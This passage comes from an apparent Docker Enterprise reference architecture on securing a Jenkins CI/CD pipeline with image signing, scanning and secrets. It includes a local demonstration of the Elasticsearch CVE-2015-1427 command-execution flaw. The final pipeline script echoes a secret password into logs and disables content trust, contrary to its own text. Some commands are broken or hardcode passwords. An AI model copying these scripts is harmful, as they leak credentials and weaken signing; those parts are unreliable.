the Docker example voting app, using the Docker agent Create a freestyle Jenkins project and use the setting Restrict where this project can be run to select the agent – set this to ‘docker-cli’ when using the secure agent above. Set the Source Code Management to point to the Docker sample application at https://github.com/dockersamples/example-voting-app. Add a build step to execute a shell and then use the command `docker stack deploy --compose-file docker-stack.yml vote` to deploy the sample application to the swarm. The resulting services are shown in Figure 4. ![Manager Node](image) ![Worker Node](image) **Figure 4.** Services running on Docker swarm The user-interface for voting is available on port 5000, while the results are available on 5001. To remove all the services, run the command `docker stack rm vote` on the manager node. **Best practices for CI/CD** Deploying the sample application as a stack using the compose file simply pulls pre-built images from the Docker Hub. In a development environment, you will want to build images locally from your own codebase, push these images to your own registries and then deploy the complete application on a swarm. In this section, we will walk step-by-step through the process, adding layers of security and identifying best practices along the way, including: - Building images with an explicit build number - Infrastructure as code (IaC) - Push images to Docker Trusted Registry on every successful build - Scan images automatically - Use secrets management to protect sensitive passwords and configuration data - Create and maintain standardized baseline images - Understand the provenance of third-party images - Sign approved images in the registry - Deploy services using docker stack - Automatically sign build images using the CI system - Use Content Trust in UCP **CI/CD best practice: Building images with an explicit build number** Giving every development build its own unique identifier has many benefits including making it easier to associate bug reports with a specific build and giving users a quick indication of the relative age of the build they are using. Create a freestyle Jenkins project and set the Source Code Management to the URL for the source code, in this case the Docker sample application at [https://github.com/dockersamples/example-voting-app](https://github.com/dockersamples/example-voting-app). Use the setting Restrict where this project can be run to select the desired Docker agent. Add a build step to execute a shell and then use the following commands to build the images, tagging them with an explicit build number: ```bash docker build -t vote:0.$BUILD_NUMBER ./vote docker build -t result:0.$BUILD_NUMBER ./result docker build -t worker:0.$BUILD_NUMBER ./worker ``` Details for building the images where proxy configuration is required are given in Appendix A. **CI/CD best practice: Infrastructure as code** While the source code for the project is under revision control in Git, the scripts for building and deploying the project are edited in an interactive fashion in Jenkins and managed internally by the local Jenkins server. "Infrastructure as Code" is the process by which configuration and provisioning code is managed in the same way as source code. To migrate the existing build to use this process, create a new pipeline project in Jenkins and use a pipeline script specifying different stages for each part of the process, in this case “Pull” and “Build Images”. This script can be stored and managed using a version control system just like your source code, and new builds can be triggered automatically when the pipeline code changes. ```groovy node() { stage("Pull") { git "https://github.com/dockersamples/example-voting-app" } } node("docker-cli") { stage("Build Images") { ``` ```sh dir('vote') { sh "docker build -t vote:0.$BUILD_NUMBER . " } dir('result') { sh "docker build -t result:0.$BUILD_NUMBER . " } ``` Listing the images available on the node shows the images with the build number included in the tag: docker images <table> <thead> <tr> <th>REPOSITORY</th> <th>TAG</th> <th>IMAGE ID</th> <th>CREATED</th> <th>SIZE</th> </tr> </thead> <tbody> <tr> <td>result</td> <td>0.1</td> <td>496e2ee7c194</td> <td>6 minutes ago</td> <td>228 MB</td> </tr> <tr> <td>vote</td> <td>0.1</td> <td>5c5a27847c16</td> <td>7 minutes ago</td> <td>84.7 MB</td> </tr> </tbody> </table> In Figure 5, you can see that Jenkins UI shows the two distinct stages graphically: ![Pipeline test-pipeline](image) **Figure 5.** Jenkins pipeline stages CI/CD best practice: Push images to Docker Trusted Registry on every successful build The pipeline can be extended to include a stage for pushing the images to a local instance of Docker Trusted Registry. This example assumes that a jenkins user has been setup in Docker Trusted Registry (running on the swarm worker node at 10.10.174.28) and that it has write access to the dev/vote and dev/result repositories. Notice how the images are now tagged appropriately for the target repositories. ```plaintext node() { stage("Pull") { git "https://github.com/dockersamples/example-voting-app" } } node("docker-cli") { stage("Build Images") { dir('vote') { sh "docker build -t 10.10.174.28/dev/vote:0.$BUILD_NUMBER . " } dir('result') { sh "docker build -t 10.10.174.28/dev/result:0.$BUILD_NUMBER . " } } } node("docker-cli") { stage("Push Images") { sh "docker login --username jenkins --password $JENKINS_PASSWORD 10.10.174.28" sh "docker push 10.10.174.28/dev/vote:0.$BUILD_NUMBER" sh "docker push 10.10.174.28/dev/result:0.$BUILD_NUMBER" sh "docker logout 10.10.174.28" } } ``` Details for building the images where proxy configuration is required are given in Appendix A. CI/CD best practice: Scan images automatically Image scanning is turned on in DTR under Settings ➔ Security. Each individual repository has its own settings for controlling the frequency of scanning – in a development environment, scanning should be performed on every build/push cycle, assuming the processing overhead is not too high. Most layers in your images will not change between builds and so the scanning can restrict itself to incrementally check only those layers that are different. Forcing images to be scanned as part of the software development lifecycle ensures that unscanned images can never make it into production. To see how scanning can identify problems, pull an image with a known vulnerability from Docker Hub, re-tag it and push it to a local repository that is set to scan automatically. ``` docker pull elasticsearch:1.4.2 docker tag elasticsearch:1.4.2 docker push 10.10.174.28/dev/elasticsearch:vulnerable ``` DTR correctly identifies that this version of Elasticsearch contains a critical vulnerability in the scripting engine as shown in Figure 6. The vulnerability allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands. DTR provides a link to the public database for more information on the vulnerability see https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1427. To test the vulnerability locally (provided your testing environment is not publicly accessible), run a container using the vulnerable image and add some initial data, see the Elasticsearch in 5 minutes tutorial, for a quick introduction. Then, execute a shell command, in this instance ls, through the search interface that, in this particular version of Elasticsearch, erroneously allows certain Java classes to run unrestricted in the container. docker run -d -p 9200:9200 --name elastic 10.10.174.28/dev/elasticsearch:vulnerable curl -XPUT 'http://localhost:9200/blog/user/dilbert' -d '{ "name" : "Dilbert Brown" }' An extract from the search results is given below, showing the output of the ls command for the container: "myscript" : ["bin "bin\boot\dev\netc\home\nlib\nlib64\nmedia\nmnt\nopt\nproc\root\munin\nsbin\nsvronsys\ntmp\usrc\usr\var"] This is an example of the added security you automatically get by running applications in containers – if this version of Elasticsearch was running on a bare-metal server, the exploit would provide remote access to the server itself rather than just to the container as happens in this instance. There are a number of free resources available for learning about Docker and for running test services, including Katacoda and play-with-docker. Katacoda, in particular, presents many scenarios for securing Docker at the container level using cgroups, namespaces, seccomp, capabilities, etc., including a version of the preceding example using Elasticsearch. See https://katacoda.com/courses/docker-security for more information. These public sandboxes can provide a safe means for testing vulnerabilities and potential remediations without the need to compromise your internal systems. CI/CD best practice: Use secrets management to protect sensitive passwords and configuration data While the password for accessing the registry can be configured using an environment variable, a more secure solution is provided through the use of the secrets management functionality in Docker swarm. Each secret is made available inside the container as a distinct file in a temporary filesystem at `/run/secrets`. You can create a secret in the UCP UI under Resources → Secrets and then update the docker-agent service with the newly created secret using Services → Service → Environment → Use a secret. Alternatively, you can use the command line: ```bash echo -n "jenkinspassword" | docker secret create JENKINS_PASSWORD - docker service update --secret-add JENKINS_PASSWORD docker-agent ``` In the Jenkins pipeline script, we just need to read the contents of the secrets file to set the password securely: ```groovy node("docker") { stage("Push Images") dir('/run/secrets') { sh "docker login --username jenkins --password ${readFile('./JENKINS_PASSWORD')} 10.10.174.28" sh "docker push 10.10.174.28/dev/vote:0.$BUILD_NUMBER" sh "docker push 10.10.174.28/dev/result:0.$BUILD_NUMBER" sh "docker logout 10.10.174.28" } } ``` **Note** When using the command line, we use the `-n` option on `echo` to omit a newline at the end of the file. Otherwise, the newline will terminate the shell command line early, resulting in the target registry being ignored, and the command will attempt to log in to the Docker Hub by default. While secrets are intended for use with sensitive data like passwords, access tokens or certs, they can also be used for passing in configuration information that needs to change depending on the run-time environment. CI/CD best practice: Create and maintain standardized baseline images An organization will typically standardize on a small number of operating systems, with specific hardening and common tools applied. On top of this base, distinct images will be created for each programming language stack required, for example, one for Java/Spring Boot framework and another for Python/Flask. Limiting the number of baseline images makes it easier to identify and update affected images whenever vulnerabilities are discovered. Security and operations personnel should be responsible for creating these baseline images, with input from developers on what functionality is required. The build files for the baseline images should be under strict revision control to prevent ad-hoc packages or scripts being added without approval while the images themselves should be signed and stored in the registry. You should strive to create the smallest base image possible, using a minimal base image such as `alpine`, since the number of vulnerabilities is typically proportionate to size of image. Docker maintains a list of best practices for creating images [here](https://docs.docker.com/). CI/CD best practice: Understand the provenance of third-party images The official repository at Docker Hub (and more recently Docker Store) is the best starting point for locating curated images for OS and popular programming language runtimes. The official images are signed by Docker and tend to be patched and updated frequently, with security scanning results available to identify any vulnerabilities in image layers and components. It is recommended that you pull specific versions (rather than defaulting to `:latest`) when accessing images on an official repository. Even so, you should be aware that Docker tags are not immutable and that an image with a seemingly explicit “version” tag may change without you realizing it. As such, you should pin to a specific instance using the digest rather than a tag. If you are using images from another repository, you should pull, re-tag, sign and push them to your local registry. It can be hard to know exactly what is contained in an image if it has a chain of FROM clauses. Each Dockerfile can download and install packages, add users, expose ports, set environment variables and run arbitrary scripts. It is worthwhile following the inheritance chain and understanding what each layer adds to the finished image. If you need to take complete control of your images, you could re-build them from scratch using the existing Dockerfiles in the chain as a template. In this way you decide exactly what should be in the image but this approach can be a double-edged sword. Maintaining such custom images requires tracking all changes to the component images in the chain and applying updates/patches to your custom image when appropriate and, as such, this approach should not be undertaken lightly. Either way, it is highly advisable to investigate the provenance of third-party images and to keep a local copy of any Dockerfiles and shell scripts that are used to create the images you rely upon. Dependency management is a significant task, not just for your Docker images but also for your code dependencies in general (with Maven, npm, etc.) and it is key in being able to reliably reproduce specific builds for your multiple deployment environments including QA (E2E, UAT, performance), staging and production. **CI/CD best practice: Sign approved images in the registry** Setting the environment variable `DOCKER_CONTENT_TRUST=1` means any image you push to a registry will be signed. This example assumes the devops1 user has write access to the `official/redis` repository. Once we are happy with the provenance of our third-party images, which have already been signed by Docker, we re-tag them and store them in our DTR instance so that we have local copies and can always recreate our environments on demand. - `export DOCKER_CONTENT_TRUST=1` - `docker pull redis:3.2.9-alpine` - `docker tag redis:3.2.9-alpine 10.10.174.28/official/redis:3.2.9-alpine` - `docker pull postgres:9.4` - `docker tag postgres:9.4 10.10.174.28/official/postgres:9.4` - `docker login --username devops1 --password devops1password 10.10.174.28` - `docker push 10.10.174.28/official/redis:3.2.9-alpine` - `docker push 10.10.174.28/official/postgres:9.4` **Note** If you encounter an error similar to "certificate signed by unknown authority" you will need to make your Docker Engine trust the certificate authority used by DTR. For more information, see [https://docs.docker.com/datacenter/dtr/2.2/guides/user/access-dtr/](https://docs.docker.com/datacenter/dtr/2.2/guides/user/access-dtr/) In our RHEL 7 environment, we performed the following steps: - `curl -k https://10.10.174.28/ca -o /etc/pki/ca-trust/source/anchors/10.10.174.28.crt` - `sudo update-ca-trust` - `sudo /bin/systemctl restart docker.service` If this is the first push with content trust enabled, you will be prompted to create a new root signing key passphrase, along with a repository key passphrase. You can see in DTR, in Figure 7 below, that the image has been signed. ![Docker Trusted Registry](image) **Figure 7.** Signed image in repository **CI/CD best practice: Automatically sign build images using the CI system** The CI system should sign images it builds when pushing them to the local registry, setting `DOCKER_CONTENT_TRUST=1` in the pipeline script. ```bash node("docker-cli") { stage("Push Images") { withEnv(['"DOCKER_CONTENT_TRUST=1"']) { dir('/run/secrets') { sh "docker login --username jenkins --password ${readFile("./JENKINS_PASSWORD")} 10.10.174.28" sh "docker push 10.10.174.28/dev/vote:0.$BUILD_NUMBER" sh "docker push 10.10.174.28/dev/result:0.$BUILD_NUMBER" sh "docker push 10.10.174.28/dev/worker:0.$BUILD_NUMBER" sh "docker logout 10.10.174.28" } } } } ``` **CI/CD best practice: Deploy services using Docker stack** We can combine our approved third-party images with the images we have built locally for our application code and deploy them automatically in Jenkins using a compose file and the `docker stack` command. Stacks are a convenient way to automatically deploy multiple services that are linked to each other, without needing to define each one separately. Stack files are in YAML format and define environment variables, deployment tags, the number of containers, and related environment-specific configuration. We modify the compose file. [https://github.com/dockersamples/example-voting-app/blob/master/docker-stack.yml](https://github.com/dockersamples/example-voting-app/blob/master/docker-stack.yml) so that it now pulls the approved third-party `redis` and `postgres` images from our `official` repository, and the application-specific images from the `dev` repository used by Jenkins and then combine these images in a new `Deploy stack` stage in the pipeline script. The complete compose file and pipeline script file are available in [Appendix B](#). **CI/CD best practice: Use Content Trust in UCP** UCP can restrict the services running on the Docker swarm to those signed by particular groups of users. However, UCP cannot automatically trust the images you have signed in DTR because it cannot associate the private key, which you are using for signing, with your UCP account. To sign images in the registry in such a way that UCP can trust them, you need to: - Setup a Notary client. (Notary is a Docker project that allows anyone to have trust over arbitrary collections of data and is based on The Update Framework, a secure general design for the problem of software distribution and updates). - Initialize trust metadata for your repositories, either by pushing content or using a notary init/key rotate/publish cycle. - Delegate signing to the keys in the UCP client bundles for your users, in this case devops1 and jenkins. - Add these users to teams in UCP, and use these teams when requiring signatures in UCP → Admin Settings → Content Trust. The implementation details for setting up Content Trust with UCP are available in Appendix C. Once you have signed your images so that UCP can trust them, you can deploy the stack as usual using docker stack deploy --compose-file docker-stack.yml vote. Content Trust in UCP is a key element in securing your Docker swarm, allowing you to gate releases onto different environments based on approvals from the relevant teams. **Best practices for development** In the same way that there are a multitude of configurations for your CI/CD pipeline, there are also numerous common developer workflows including using a single master branch in a central repository, using feature branches with pull requests for code review, or even more rigorous scenarios where code changes require review and approvals, including passing CI tests, before the changes are committed. One typical developer workflow using Docker is shown in Figure 8: ![Figure 8. Developer Workflow](image) Developers use a Source Code Management system for their code, and repositories appropriate to the programming languages they are using (for example, Artifactory for Java dependencies and build artifacts). Using Docker, they can build images locally and deploy services, either locally or in an integration environment. **Development best practice: Replicate CI environment on developer workstations** One of the big attractions of Docker from the development point of view is the ability to run multiple versions of OS platforms, databases, or application stacks on a single developer workstation or laptop. Likewise, the ability to maintain consistent software configurations across all your developers’ environments helps to avoid the “it works on my machine” dilemma. While the CI/CD workflow is the single source of truth for images, developers can build and test images locally, and even deploy multi-node stacks using `docker-machine`. The closer the development environment is to the CI one, the more confidence a developer will have that a commit will not break the build. **Development best practice: Multi-stage builds** In your CI environment, you can deploy multiple flavors of build agents for each programming stack you use, for example one agent may be responsible for all Java builds, pulling in dependencies from external repositories (like Artifactory or Nexus), compiling code, building jar or war files and saving these build artifacts to a repository. A separate agent may use the build artifacts to create images and deploy services on the Docker swarm. It is now possible for developers to mimic this approach using Docker’s multi-stage builds, in the first stage creating a complete build environment while, in the second stage, setting up a minimal run-time environment. **Best practices for operations** There are a number of different patterns used for deploying applications in a production environment, for example, Blue-Green, Canary or Rolling. Ideally, you should be able to perform push-button deployment of any build at any time, but for business reasons the actual process may be slower and involve some manual input from your operations team. In enterprise environments, it is common to separate develop and build systems from run-time resources and so there will be separate production and non-production UCP clusters. However, having a single master DTR cluster allows centralized enforcement of security best practices including signing, scanning and secrets. Note that policy enforcement on image signing requires you to have your DTR in the same cluster as UCP. **Operations best practice: Use UCP/DTR security features** Docker’s commercial offerings provide a wide range of features to help secure your entire software supply chain, including deployment and ongoing maintenance and monitoring. A single sign-on service provides a shared authentication service for UCP and DTR and works out of the box or via an externally-managed LDAP/AD service. You can replace the self-signed certs in UCP and DTR with fully-signed certificates using your organization’s Certificate Authority (CA). Role-Based Access Control (RBAC) provides fine-grained control over access to individual volumes, networks, images, secrets, and running containers. (While users are shared across UCP and DTR, UCP uses “teams” to organize users into groups, whereas DTR has the concept of “organizations” for controlling access to repositories). When using DTR and Notary for image signing, key management is critical and, if possible, you should use a hardware token like a Yubikey. For more information, see the [Docker Reference Architecture for Security Best Practices](#). **Operations best practice: Take advantage of container security features** Container security features can be used to limit the occurrences of incidences such as kernel exploits, denial-of-service attacks or container breakouts. These features include: - Kernel namespaces provide the isolation between containers and also the host itself. - cgroups control the amount of system resources that a container can use. - Kernel capabilities provide a fine-grained access control system over what operations a container can run. - Secure computing mode (seccomp) is a Linux kernel feature that you can use to restrict the actions available within a container. - The Linux Security Module (LSM) framework including SELinux and AppArmor. The security features should be used to limit the resources and the access rights for containers: - User namespaces is a relatively new feature in Docker (1.10). It allows the Docker daemon to create an isolated namespace that looks and feels like a root namespace. However, the root user inside of this namespace is mapped to a non-privileged uid on the Docker Host. This means that containers can effectively have root privilege inside of the user namespace, but have no privileges on the Docker Host. For more information on user namespaces, see the Docker Knowledgebase article [here](#) and the tutorial [here](#). - By default, Docker drops all capabilities except those needed using a whitelist approach, while allowing you to expand or contract the set. The seccomp profile is a whitelist that denies access to system calls by default, then whitelists specific system calls. The default seccomp profile provides a sane default for running containers with seccomp and disables around 44 system calls out of more than 300 calls, while you can expand (or contract) this number based on your applications needs. - AppArmor (Application Armor) is a Linux security module that protects an operating system and its applications from security threats. Docker automatically generates and loads a default AppArmor profile for containers that is moderately protective while providing wide application compatibility. Once again, in line with the Docker philosophy of built-in but customizable security, you modify the profiles to suit your own custom needs. The definitive treatment of (Linux) container security by Aaron Grattafiori is available at https://www.nccgroup.trust/us/our-research/understanding-and-hardening-linux-containers/. Docker also maintains a list of security vulnerabilities which Docker mitigated, such that processes running in Docker containers were never vulnerable to the bug – see https://docs.docker.com/engine/security/non-events/. **Operations best practice: Production** Standard checks should be performed before running any images in your production cluster. Images must have the correct configuration, must include any required packages and exclude any blacklisted packages, and any third-party software should be updated and patched appropriately. There must not be any secrets (for example, passwords, access tokens or certs) embedded in the images and the network ports that are exposed must be known and approved. Images should be signed by the required teams, including CI/CD, QA, security, etc. and runtime options should be set to restrict resource utilization. Access to production servers should be severely restricted – in particular, developers should not expect `ssh` or `docker exec` access to debug issues. Instead, a comprehensive logging and monitoring solution should be deployed on the swarm, to identify any suspicious patterns and to provide enough information to identify the source of any problems. On-going security scanning and maintaining an up-to-date vulnerabilities database will help you to proactively manage any new threats. It is important to realize that node uptime is not necessarily indicative of node health and to understand the concept of “reverse uptime”. Rather than tracking how long a server has been up, instead you should limit the maximum time any server can be up for and then reimage it. **Operations best practice: Immutable infrastructure** In general, containers should be run in read-only mode where possible, mounting explicit directories as writable as required by your applications. This severely restricts the damage an attack can do if it does get through your other layers of defense. This idea can be expanded to cover all intentional updates as well (for example, installing new packages, upgrading existing packages, minor code changes to CSS, etc.). Instead of making changes directly to running services, you make the changes in the build environment, maintaining your changes in the source code management system, and then building, testing and re-deploying the new images. Using immutable containers allows you to minimize “drift”, where servers that should be running the same code are out of sync due to direct manual changes or random failures in automated provisioning. It also allows you to quickly and reliably rollback to a known good state when a planned upgrade goes wrong. **Operations best practices: Run Docker Bench regularly** The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production. The tests are all automated, and are inspired by the Center for Internet Security (CIS) Docker 1.13 Benchmark, an objective, consensus-driven security guideline for the Docker Server Software. It can be run as privileged container on any host and running it on a regular cadence will improve the security posture of your servers. **Operations best practices: Use encrypted overlay networks** Overlay networking for Docker Engine swarm mode comes secure out of the box. You can also encrypt data exchanged between containers on different nodes on the overlay network. To enable encryption, when you create an overlay network pass the `--opt encrypted` flag. Because the overlay networks for swarm mode use encryption keys from the manager nodes to encrypt the gossip communications, only containers running as tasks in the swarm have access to the keys. Consequently, containers started outside of swarm mode using `docker run` (unmanaged containers) cannot attach to the overlay network. To work around this situation, you must migrate the unmanaged containers to managed services. For more information in encrypted overlay networks, see the Docker documentation here. **Summary** This document shows how Docker Enterprise Edition can be used to secure the entire software supply chain, from development to integration, through testing to deployment and on-going maintenance. At a time when the processes involved in software delivery are undergoing rapid transformation, with the need for speed and agility having to be balanced against ever increasing security threats, the Docker philosophy of providing secure platform, content and access out-of-the-box facilitates a proactive approach to security from your development, QA and operations teams. Your build teams can leverage features such as signing, scanning, and secrets, along with concepts such as infrastructure as code and standardized baseline images to secure the CI/CD pipeline. Developer productivity can be enhanced through the use of multi-stage builds and the ability to easily replicate multiple and complex build environments on workstations and laptops. Finally, operations personnel can target immutable infrastructure and the use of DTR as a single source of truth as a goal for simplifying deployment and on-going maintenance. Following the suggested best practices outlined in this document for CI/CD, development and operations will ultimately allow you to deploy your applications more securely in containers that on bare-metal. Appendix A: Jenkins implementation details Building a sample project to test Jenkins service 1. Install Maven using Manage Jenkins ➔ Global Tool Configuration ➔ Add Maven. Choose to install version 3.5.0 from Apache and name it Maven35. Note that the software is not immediately installed but is downloaded once a project uses it for the first time. If the various versions do not appear in a drop-down menu, you may need to restart Jenkins (10.10.174.27:8082/Jenkins/restart) for the proxy configuration to kick in. 2. Create a new freestyle project using Jenkins ➔ New Item to test that Jenkins is working correctly. 3. Set the Source Code Management to Git and set the Repository Url to https://github.com/spring-projects/spring-boot. Tab out of the textbox to ensure that any required proxies are configured correctly and that the Github repository can be accessed. 4. Add a Build Step to Invoke top-level Maven targets and set the Maven Version to Maven35, the Goals to package. This particular repository contains multiple example projects so we need to set an explicit POM using the Advanced... button. To just build the Sample Atmosphere example, specify the POM as spring-boot-samples/spring-boot-sample-atmosphere/pom.xml. 5. Save the project and then select Build Now to build it. 6. Look at the console output for the running build. If the dependencies are downloading very slowly or not at all, you may need to explicitly set the proxy configuration for this Maven installation. Modify the settings.xml file at jenkins_home/tools/hudson.tasks.Maven_MavenInstallation/Maven35 to configure the proxy: ```xml <settings ...> <proxies> <proxy> <id>httpproxy</id> <active>true</active> <protocol>http</protocol> <host>proxy.myproxy.net</host> <port>8080</port> <nonProxyHosts>localhost</nonProxyHosts> </proxy> <proxy> <id>httpsproxy</id> <active>true</active> <protocol>https</protocol> <host>proxy.myproxy.net</host> <port>8080</port> <nonProxyHosts>localhost</nonProxyHosts> </proxy> </proxies> </settings> ``` It can also be helpful to change the connection settings if you are having trouble with your proxy as the default timeouts are very long: ```xml <servers> <server> <id>myserver</id> <configuration> <httpConfiguration> ``` <put> <connectionTimeout>10000</connectionTimeout> <readTimeout>30000</readTimeout> </put> </httpConfiguration> </configuration> </server> </servers> 7. If Jenkins is configured correctly, the code should compile and the tests should run to completion successfully. **Proxy configuration for Jenkins** Instead of specifying the proxy configuration using the Manage Jenkins ➔ Manage Plugins ➔ Advanced, you can start the Jenkins service with a proxy configuration specified. docker service create --name jenkins-proxy -p 8082:8080 -p 50000:50000 --constraint 'node.labels.env == jenkins' -e JENKINS_OPTS="--prefix=/jenkins" -e JAVA_OPTS="-Dhttp.proxyHost=proxy.myproxy.net -Dhttp.proxyPort=8080 -Dhttps.proxyHost=proxy.myproxy.net -Dhttps.proxyPort=8080" --mount "type=bind,source=$PWD/jenkins_home,target=/var/jenkins_home" jenkins:2.46.3-alpine **Note** We found that it was still necessary to explicitly set the proxy again in the Manage Jenkins ➔ Manage Plugins ➔ Advanced tab for the proxy to take effect for some plug-ins, even when Jenkins was started with the proxy configured up front. **Proxy configuration when building sample images** The vote front-end, [https://github.com/dockersamples/example-voting-app/blob/master/vote/Dockerfile](https://github.com/dockersamples/example-voting-app/blob/master/vote/Dockerfile), is a Python-based application that uses pip to install required software. We pass the proxy setting as a variable to the build command, for example, `docker build -t vote:0.0.BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 ./vote` and use the variable in the Dockerfile for the pip install: ARG PROXY RUN pip install -r requirements.txt --proxy=$PROXY. The result front-end, [https://github.com/dockersamples/example-voting-app/blob/master/result/Dockerfile](https://github.com/dockersamples/example-voting-app/blob/master/result/Dockerfile), is a Nodejs-based application that uses npm to install required packages. We pass the proxy setting as a variable to the build command, for example, `docker build -t result:0.0.BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 ./result` and use the variable in the Dockerfile for the npm install: ARG PROXY RUN npm config set proxy $PROXY RUN npm config set https-proxy $PROXY The default worker, [https://github.com/dockersamples/example-voting-app/blob/master/worker/Dockerfile](https://github.com/dockersamples/example-voting-app/blob/master/worker/Dockerfile), is a dotNet application. We pass the proxy setting as a variable to the build command, for example, `docker build -t worker:0.0.BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 ./worker` and use the variable in the Dockerfile: ARG PROXY ENV http_proxy $PROXY Appendix B: Pipeline for building and deploying stack The pipeline script builds and tags the 3 application images and pushes them to the local repository. It then deploys the application to the swarm using the compose file. Pipeline script ```groovy node("docker-cli") { stage("Build Images") { dir('vote') { sh "docker build -t 10.10.174.28/dev/vote:0.$BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 . " } dir('result') { sh "docker build -t 10.10.174.28/dev/result:0.$BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 . " } dir('worker') { sh "docker build -t 10.10.174.28/dev/worker:0.$BUILD_NUMBER --build-arg PROXY=http://proxy.myproxy.net:8080 . " } } } node("docker-cli") { stage("Push Images") { withEnv(["DOCKER_CONTENT_TRUST=0"]) { dir('/run/secrets') { sh "echo $(readFile('./JENKINS_PASSWORD'))" sh "echo password over" sh "docker login --username jenkins --password $(readFile('./JENKINS_PASSWORD')) 10.10.174.28" sh "docker push 10.10.174.28/dev/vote:0.$BUILD_NUMBER" sh "docker push 10.10.174.28/dev/result:0.$BUILD_NUMBER" sh "docker push 10.10.174.28/dev/worker:0.$BUILD_NUMBER" sh "docker logout 10.10.174.28" } } } } node("docker-cli") { stage("Deploy stack") { sh "docker stack rm vote" } } ``` sh "sleep 30" sh "docker stack deploy --compose-file docker-stack.yml vote" Compose file for deploying stack The compose file is used to create the required networks and services, deploying images from the local official and dev repositories. It determines the ports used, the restart policies and the placement of services based on the constraints specified. version: "3" services: redis: image: 10.10.174.28/official/redis:3.2.9-alpine ports: - "6379" networks: - frontend deploy: replicas: 2 update_config: parallelism: 2 delay: 10s restart_policy: condition: on-failure db: image: 10.10.174.28/official/postgres:9.4 volumes: - db-data:/var/lib/postgresql/data networks: - backend deploy: placement: constraints: [node.role == manager] vote: image: 10.10.174.28/dev/vote:0.$BUILD_NUMBER ports: - 5000:80 networks: - frontend depends_on: - redis deploy: replicas: 2 update_config: parallelism: 2 restart_policy: condition: on-failure result: image: 10.10.174.28/dev/result:0.$BUILD_NUMBER ports: - 5001:80 networks: - backend depends_on: - db deploy: replicas: 1 update_config: parallelism: 2 delay: 10s restart_policy: condition: on-failure worker: image: 10.10.174.28/dev/worker:0.$BUILD_NUMBER networks: - frontend - backend deploy: mode: replicated replicas: 1 labels: [APP-VOTING] restart_policy: condition: on-failure delay: 10s max_attempts: 3 window: 120s placement: constraints: [node.role == manager] # visualizer: # image: dockersamples/visualizer:stable # ports: # - "8080:8080" # stop_grace_period: 1m30s # volumes: # - /var/run/docker.sock:/var/run/docker.sock # deploy: # placement: # constraints: [node.role == manager] networks: frontend: backend: volumes: db-data: Appendix C: Content Trust implementation details UCP Content Trust Add the devops1 and jenkins users to a new team, devops, in UCP. We use this team when specifying the signing criteria required in the user interface at UCP → Admin Settings → Content Trust. Install Notary client The documentation for installing and using the Docker Notary client is available at https://docs.docker.com/notary/getting_started/. Initialize trust metadata for official repositories There are two ways for initializing trust metadata – using a notary init/key rotate/publish cycle, or by pushing content for the first time to the repository. Here we use both methods for the purposes of illustration. Initialize with Notary ```bash notary init 10.10.174.28/official/postgres No root keys found. Generating a new root key... Enter passphrase for new root key with ID 6fefae6: Repeat passphrase for new root key with ID 6fefae6: Enter passphrase for new targets key with ID 0a38a13 [10.10.174.28/official/postgres]: Repeat passphrase for new targets key with ID 0a38a13 [10.10.174.28/official/postgres]: Enter passphrase for new snapshot key with ID ebc4783 [10.10.174.28/official/postgres]: Enter passphrase for new snapshot key with ID ebc4783 [10.10.174.28/official/postgres]: Enter username: devops1 Enter password: ``` ```bash notary key rotate 10.10.174.28/official/postgres snapshot -r Enter username: devops1 Enter password: Enter passphrase for root key with ID 6fefae6: Enter passphrase for targets key with ID 0a38a13: Successfully rotated snapshot key for repository 10.10.174.28/official/postgres ``` ```bash notary publish 10.10.174.28/official/postgres Pushing changes to 10.10.174.28/official/postgres Enter username: devops1 Enter password: Enter passphrase for targets key with ID 0a38a13: ``` Add a delegation for the devops1 user for the official/postgres repository. Download the UCP client bundle for the devops1 user and copy and extract the zip file into a devops1 subdirectory. The public key for the devops1 user is ./devops1/cert.pem and the private key is at ./devops1/key.pem. ```bash notary delegation add 10.10.174.28/official/postgres targets/releases --all-paths ./devops1/cert.pem notary delegation add 10.10.174.28/official/postgres targets/official --all-paths ./devops1/cert.pem notary publish 10.10.174.28/official/postgres notary key import ./devops1/key.pem Enter passphrase for new delegation key with ID 6ef873e [tuf_keys]: Repeat passphrase for new delegation key with ID 6ef873e [tuf_keys]: ``` Now use the devops1 delegation key to sign the official postgres image: docker tag postgres:9.4 10.10.174.28/official/postgres:9.4 export DOCKER_CONTENT_TRUST=1 docker login --username devops1 --password devops1password 10.10.174.28 docker push 10.10.174.28/official/postgres:9.4 Enter passphrase for delegation key with ID 6ef873e: Successfully signed "10.10.174.28/official/postgres":9.4 Initialize with push As an alternative to using notary init, you can push content to the repository to initialize trust metadata. docker tag redis:3.2.9-alpine 10.10.174.28/official/redis:3.2.9-alpine export DOCKER_CONTENT_TRUST=1 docker login --username devops1 --password devops1password 10.10.174.28 Enter passphrase for root key with ID 6fefae6: Enter passphrase for new repository key with ID b02c42b [10.10.174.28/official/redis]: Repeat passphrase for new repository key with ID b02c42b [10.10.174.28/official/redis]: Finished initializing "10.10.174.28/official/redis" Successfully signed "10.10.174.28/official/redis":3.2.9-alpine Again, you set up delegation keys for the official/redis repository for the devops1 user and then push the redis image specifying the passphrase for the delegation key. At this point, it is useful to create a test service in UCP using the image you have just pushed, to check that the signing has been performed correctly and that the image passes the signing criteria specified in UCP → Admin Settings → Content Trust. Initialize trust metadata for dev repositories We follow the same procedure for the dev repositories, this time copying and expanding the UCP client bundle for the jenkins user into a ./jenkins subfolder: - Initialize the trust metadata for each of the three repositories, dev/vote, dev/result and dev/worker. - Create delegation keys for each repository using the ./jenkins/cert.pem file. - Import the private key for the jenkins user from the ./jenkins/key.pem file. - Log in to the local DTR repository as the jenkins user, set DOCKER_CONTENT_TRUST=1 and push the images from the latest build (0.26 in our case). Deploy the stack in UCP In UCP, use Resources → Stacks & Applications → Deploy to deploy the stack, as shown below in Figure 9. If successful, you should see the networks and services being deployed, as shown below in Figure 10. Figure 9. Deploy stack Figure 10. Creating networks and services By contrast, using the previous build images (0.25) that were not signed, you will see an error as shown below in Figure 11. Figure 11. Failed deployment Resources and additional links HPE Reference Architectures, hpe.com/info/ra HPE Servers, hpe.com/servers HPE Storage, 